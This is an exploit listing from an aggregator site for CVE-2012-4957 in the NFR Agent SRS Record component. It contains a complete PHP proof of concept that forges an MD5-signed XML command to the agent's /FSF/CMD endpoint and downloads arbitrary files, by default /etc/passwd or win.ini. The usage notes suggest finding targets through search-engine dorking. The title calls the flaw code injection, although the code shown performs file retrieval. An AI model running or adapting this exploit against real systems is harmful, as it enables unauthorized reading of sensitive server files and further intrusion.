Exploit for 📄 NFR Agent SRS Record 1.0.4.3 PHP Code Injection CVE-2012-4957

Name: Exploit for 📄 NFR Agent SRS Record 1.0.4.3 PHP Code Injection CVE-2012-4957
Rating: 5 (122 reviews)
2026-02-16 | CVSS 7.8
## https://sploitus.com/exploit?id=PACKETSTORM:215625
=============================================================================================================================================
    | # Title     : NFR Agent SRS Record 1.0.4.3 PHP Code Injection Vulnerability                                                               |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://documentation.n-able.com/remote-management/userguide/Content/agentreleasenotes.htm                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: This code is written in PHP and aims to exploit a vulnerability in the NFR Agent to retrieve any file from the targeted server.
    	
    	( https://packetstorm.news/files/id/181031/	CVE-2012-4957 )
    	
    [+] save code as poc.php.
    
    [+] Set Target : line 49
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    <?php
    
    class NFRFileRetriever {
        private $host;
        private $port;
        private $ssl;
        private $remoteFile;
    
        public function __construct($host, $port = 3037, $ssl = true, $remoteFile = null) {
            $this->host = $host;
            $this->port = $port;
            $this->ssl = $ssl;
            $this->remoteFile = $remoteFile ?: (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN' ? 'C:\\Windows\\win.ini' : '/etc/passwd');
        }
    
        private function generateMessage() {
            $record = "<RECORD><NAME>SRS</NAME><OPERATION>4</OPERATION><CMD>103</CMD><PATH>" . $this->remoteFile . "</PATH></RECORD>";
            $md5 = strtoupper(md5("SRS" . $record . "SERVER"));
            return $md5 . $record;
        }
    
        public function retrieveFile() {
            $url = ($this->ssl ? "https" : "http") . "://" . $this->host . ":" . $this->port . "/FSF/CMD";
            
            $message = $this->generateMessage();
    
            $options = [
                'http' => [
                    'header'  => "Content-Type: text/xml\r\n",
                    'method'  => 'POST',
                    'content' => $message
                ]
            ];
            
            $context = stream_context_create($options);
            $response = file_get_contents($url, false, $context);
            
            if ($response && strpos($response, "<RESULT>") === false) {
                $fileName = basename($this->remoteFile);
                file_put_contents($fileName, $response);
                echo "[+] " . $this->remoteFile . " saved as " . $fileName . "\n";
            } else {
                echo "[-] Failed to retrieve the file contents\n";
            }
        }
    }
    
    // مثال للاستخدام:
    $retriever = new NFRFileRetriever('target_ip');
    $retriever->retrieveFile();
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================